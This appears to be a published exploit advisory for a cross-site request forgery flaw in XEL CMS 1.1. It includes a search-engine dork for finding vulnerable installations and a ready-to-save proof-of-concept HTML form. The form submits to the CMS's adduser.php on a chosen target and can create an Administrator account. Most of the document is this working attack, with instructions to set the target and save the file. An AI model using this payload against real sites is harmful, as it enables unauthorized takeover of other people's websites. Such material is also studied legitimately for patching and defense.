XEL CMS 1.1 Cross Site Request Forgery

====================================================================================================================================| # Title     : XEL cms© v1.1 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://cyberxel.com                                                                                               |  | # Dork      : "contact at: +91-98144 06799, z91-161-2408274 email: [email protected]"                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Admin Panel : /xelcms/[+] infected file : /xelcms/user/adduser.php[+] line 07 set your target.[+] save code as poc.html    <style>@import 'http://cyberxel.com/xelcms/styles/main.css';#form1 table {  font-size: 12px;} </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2> </span><br><br><form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php">  <table width="99%" border="0" cellpadding="2" cellspacing="2">    <tr>      <td width="8%">Username:</td>      <td width="92%"><label>        <input name="username" type="text" id="username" style="font-size: 10px;width:300" />      </label></td>    </tr>    <tr>      <td>Password:</td>      <td><label>        <input name="password" type="password" id="password" style="font-size: 10px;width:300" />      </label></td>    </tr>  <tr>      <td>Confirm password:</td>      <td><label>        <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />      </label></td>    </tr>    <tr>      <td>Type:</td>      <td><label>        <select name="type" id="type" style="font-size: 10px;width:300">          <option value="" selected></option>      <option value="Administrator">Administrator</option>          <option value="User">User</option>        </select>      </label></td>    </tr>    <tr>      <td>&nbsp;</td>      <td>        <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />      </td>    </tr>  </table></form>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================